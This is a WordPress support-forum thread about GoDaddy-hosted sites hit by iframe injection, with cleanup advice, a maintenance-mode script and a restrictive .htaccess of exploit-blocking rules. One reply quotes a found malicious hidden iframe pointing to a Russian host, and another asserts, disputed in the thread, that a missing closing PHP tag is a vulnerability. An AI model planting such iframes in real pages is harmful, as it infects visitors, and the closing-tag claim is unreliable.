WordPress.org

Support

Support » How-To and Troubleshooting » Exploits and GoDaddy

Exploits and GoDaddy

  • Until yesterday I was running 2.3, and experienced several exploits over the past few weeks (the site is hosted at GoDaddy). Several PHP files were compromised in these attacks, and the pattern was that an iframe was appended to the files. I have good backups and was quickly able to replace the infected files in each case, only to find several days later that they were once again hit.

    After reading up on this, I upgraded to 2.7.1 yesterday.

    Today upon login to the admin pages, my on-access AV scanner picked up a references to gumblar.cn/rss and on subsequent logins I was warned of .js files associated with the plug-in embedded-link-with-video plug in having the JS:Redirector-H2 [Trojan].

    Since I was not able to observe any changes to WP files when I examined them with FTP, I suspect that the gumblar reference was somehow just cached in my browser, and I cleared the cache, and seem to be clear. I also deactivated the errant plug in.

    Am curious as to whether others are experiencing the same, and what steps are being take to harden sites (especially on GoDaddy). I’ve contacted their support, but with no response yet.

Viewing 15 replies - 1 through 15 (of 27 total)
  • whooami

    @whooami

    Member

    If you have been running 2.3.x you were wide open to a whole host of exploits — the very least of which is a javascript iframe attack. Hopefully, you have done more than upgrade to insure your site is secure.

    Thanks whooami, can you be more specific?

    whooami

    @whooami

    Member

    Here goes the standard reply,

    fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and reuploading, than you ought to do that. Files that you dont replace, should be looked at closely.

    Check for files that dont belong, directories that dont belong. Image files with changed timestamps — look at those. Its VERY common for there to be scripts on sites that are named in such a way to mask the fact that theyre scripts.

    Be suspicious, when youre looking at things.

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your wordpress is current.

    Change your mysql password that wordpress uses (update your wp-config.php with that new password).

    Change any admin level passwords on your blog.

    Look at any other software thats being used on your site. Is it current?

    That’s just an outline and not a complete list.

    There’s quite a bit to do, but it’s all necessary.

    Go Daddy

    @gdhosting

    Go Daddy Support

    kendoori,

    I see a lot of great advice here. I also wanted to pipe in and let you know that we can take a look to see if we can identify the source of the issue you’re experiencing. If you provide the domain name, I will follow up on the support ticket you submitted.

    GDHosting, I’d prefer to not mention the domain publicly. My GD Support ticket references Incident ID: 6153133

    They just suggested I use a stronger FTP password, which I will do.

    Go Daddy

    @gdhosting

    Go Daddy Support

    Thanks for the update. Let me know if I can help in any other way.

    I just had a run in with this exploit over the weekend as well, and wrote about it here: PHP Script Injection Exploit in WordPress 2.7.1. I cover how it was detected and resolved.

    Also, while I’m sure it can happen with other hosts as well, my site is also hosted with GoDaddy.

    Ryan S

    @ryan_accuwebhosting

    this is a very common issue with WordPress. WordPress is mot more secure, and hence you must take some measures to protect your blog:

    1) Always upgrade to the latest version. This reduces a lot of holes..
    2) Upgrade all the plugins to their latest versions.
    3) Use a strong password.
    4) Do not use unknown plugins. Deactivate and remove if you are using..

    i was hit with this one too, pretty bad. as i design sites and build custom themes, many of my clients were hit as well. avast antivirus (free) is really good at picking up this particular virus on your machine and through firefox.

    thanks kikolani, for your post. looks like i dont have to delete entire installs anymore 🙂 phew!

    also, I found 2 plugins that might help to secure wp better.
    Secure WordPress for the basics and User Locker to guard against brute attacks.

    best of luck to everyone, this virus is a pain in the rump.

    The iFrame hack hit me too just one hour ago.
    Me too I’m hosting at GoDaddy at http://www.sarahburrini.com
    And I’m using Comicpress…

    I just want to know if there’s anything I can do even if I:
    1) Did not upgrade to WordPress 2.8 (still at 2.7.1.)
    2.) Did not backup BEFORE I was hacked (I know, this will teach me)
    BUT
    I know WHEN my site was being hacked which makes me also see which files are infected.

    So, is it of any use to reinstall a new WordPress version (2.8) plus the Comicpress theme and to exchange all the infected files and upload my database again?

    Please please help! I put so much work in my Webcomics-site *sniff*
    Thanks in advance!!

    i was hacked by the “Saudi Arabia Hackers” and I am running the latest version of wordpress. What I am wondering is if they broke into my website or my email. I am guessing the backend of my site, because I recieved an email stating that my admin password had been Lost/Changed and now suddenly I cannot recieve my password.

    Maybe there is a major problem with the 2.8.4 version of WordPress? I am not entirely sure and it’s kind of weird to me. And very random. Since my site isn’t very popular at all.

    Hello,
    I suffered from the same. I’m copying my M.O. here, which worked.
    I got
    /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to login or other. So:
    1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
    2) Now you should be able to login. Go to your dashboard and install plugin “Script Exploiter”.
    3) Run the plugin and look for malicious script. In my case, I had this baby:
    <div style=”display:none”><iframe src=”http://past-another-life.ru:8080/index.php” width=571 height=464 ></iframe></div>
    copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back on the server, you should be all right.
    Cheers, hope this helps,
    Vinz

    I am a professional WordPress Developer. I have a client that was being hacked almost immediately after installing WordPress on GoDaddy. The WordPress installation right from the get go has a huge problem. The wp-config.php file in the GoDaddy WordPress installation package is exposed because it does not have the closing tag ?> at the end. This means that your SQL DB username and password can be grabbed. I am finding several other security vulnerabilites and am still in the process of isolating all of them. I have been successful at completely blocking the hackers by adding this .htaccess file below until i am completely done plugging all the holes. I would advise anyone who has WordPress installed on GoDaddy to add this .htaccess code to their website immediately. I have notified GoDaddy yesterday 2-13-2010, but i am not going to wait around for them to act and take care of this. Some of the hacks that occurred to this client. XSS hidden iframe injection, XSS injected code throughout the site affecting all critical .js files, backdoors set up everywhere, the /stats folder on godaddy has a huge security vulnerability – the primary host account password can be grabbed, there are several other security vulnerabilities that i am finding and will add a full detailed report once i have that info. For now like i said i am successfully blocking the hackers with this very restrictive .htaccess file. it will actually block you from activating plugins in your admin panel. this is an temporary inconvenience of course, but for now it is absolutely necessary for ABSOLUTE LOCKDOWN of your website. Everything else is fine ie your website is funtional and viewable by the world and can be indexed by search engines without any problems. Until i am 100% sure that i have discovered every single security vulnerability i am not giving these pricks a shot. And they have been trying now for 2 days. Since they are no longer able to clean their tracks from the logs i am watching the logs fill up with failed attempts after failed attempts at hacking this site.
    I recommend you first create a maintenance mode php script and .htaccess file for your website so that if my very restrictive .htaccess file does not allow your site to fully function properly you can just have your site display that is being worked on and under maintenance (503 status code) until you can fix everything. Once again i will post a full description of all godaddy security vulnerabilities and fixes here later once i have completed all of my investigations. This is a 503 error status that you will not be penalized for by search engines.
    create a php file called maintenanceXXXXX.php (add something unique to replace the XXXXX’s) from this code

    <?php
    header('HTTP/1.1 503 Service Temporarily Unavailable',true,503);
    header('Status: 503 Service Temporarily Unavailable');
    header('Retry-After: 172800');
    ?>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Language" content="en-us">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <meta name="robots" content="noindex,nofollow">
    <title>503 - Temporarily Closed For Maintenance</title>
    <style type="text/css">
    <!--
    p
    {
        font-family: "Verdana", sans-serif;
    }
    -->
    </style>
    </head>
    <body>
    
    <p><b>Natural Herbal Remedies</b></p>
    <p>is temporarily closed for maintenance.</p>
    <p>Normal operation will resume as soon as possible.</p>
    
    </body>
    </html>

    the maintenance mode 503 .htaccess file code

    RewriteEngine On
    RewriteBase /
    # When enabled, the next code line allows testing.
    # It says only do the rewrite if the request is from YOUR IP address.
    # Thus, you can close the site only to YOURSELF to make sure it works,
    # then comment out the line again to close the site to everyone.
    # Set it to your actual IP address at the time of the test.
    RewriteCond %{REMOTE_ADDR} ^000\.000\.000\.000$
    
    # The remaining two code lines close the site. They say:
    # if the request is NOT for /maintenance.php, send /maintenance.php instead.
    # You MUST allow at least one file to be served without rewriting it,
    # (maintenance.php in this example), to prevent endless looping.
    RewriteCond %{REQUEST_URI} !^/maintenance\.php$
    # To allow another file, copy the line above to here and change the filename.
    
    # This line says: no matter what file was requested, serve maintenance.php.
    # This is a rewrite (not a redirect), so we use the local file path, no http://
    RewriteRule ^(.*)$ /maintenanceXXXX.php [L]

    ok now for the very restrictive .htaccess file

    setenv PHPVERSION 5
    
    ### Turning on the RewriteEngine ####
    RewriteEngine on
    RewriteBase /
    ServerSignature Off
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    # FILTER REQUEST METHODS
    <IfModule mod_rewrite.c>
    RewriteCond %{REQUEST_METHOD} ^(TRACE|DELETE|TRACK) [NC]
    RewriteRule ^(.*)$ - [F,L]
    </IfModule>
    
    # QUERY STRING EXPLOITS
    <IfModule mod_rewrite.c>
    RewriteCond %{QUERY_STRING} \.\.\/ [NC,OR]
    RewriteCond %{QUERY_STRING} boot\.ini [NC,OR]
    RewriteCond %{QUERY_STRING} tag\= [NC,OR]
    RewriteCond %{QUERY_STRING} ftp\:  [NC,OR]
    RewriteCond %{QUERY_STRING} http\:  [NC,OR]
    RewriteCond %{QUERY_STRING} https\:  [NC,OR]
    RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>|’|"|;|\?|\*).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*("|'|<|>|\|{||).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(%0|%A|%B|%C|%D|%E|%F|127\.0).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
    RewriteCond %{QUERY_STRING} ^.*(request|select|insert|union|declare|drop).* [NC]
    RewriteRule ^(.*)$ - [F,L]
    </IfModule>

    This .htaccess file is so restrictive it will also block you as an admin from activating plugins, but i have been monitoring a hacker for days trying every possible XSS attack string and i see nothing but denied, not allowed, etc. messages in the website error log.

    once again i will post a more detailed godaddy wordpress security report once i have completed all of my findings. i am currently looking at the webformmailer.php file that is installed on all godaddy accounts by default – it appears that it is being exploited. You may want to temporarily disable it. gdform.php so far appears to be ok. I recommend that you immediately check your MySQL on your godaddy account and look for any databases that you did not create. clear all of the tables immediately. the db i found was called __piggy. More complete info on this will be posted tomorrow or latest tuesday. Slam the doors on these dirt bags. Good luck to all.

    . The wp-config.php file in the GoDaddy WordPress installation package is exposed because it does not have the closing tag ?> at the end

    I commend your attempts at tracking down the hacker, but the above is certainly not a bug or vulnerability – it is done intentionally to have well-formed php code.

    If you think this is a vulnerability, please post a way to test this on a live site and we will take this seriously. Otherwise you are wildly speculating.

Viewing 15 replies - 1 through 15 (of 27 total)
  • The topic ‘Exploits and GoDaddy’ is closed to new replies.
Skip to toolbar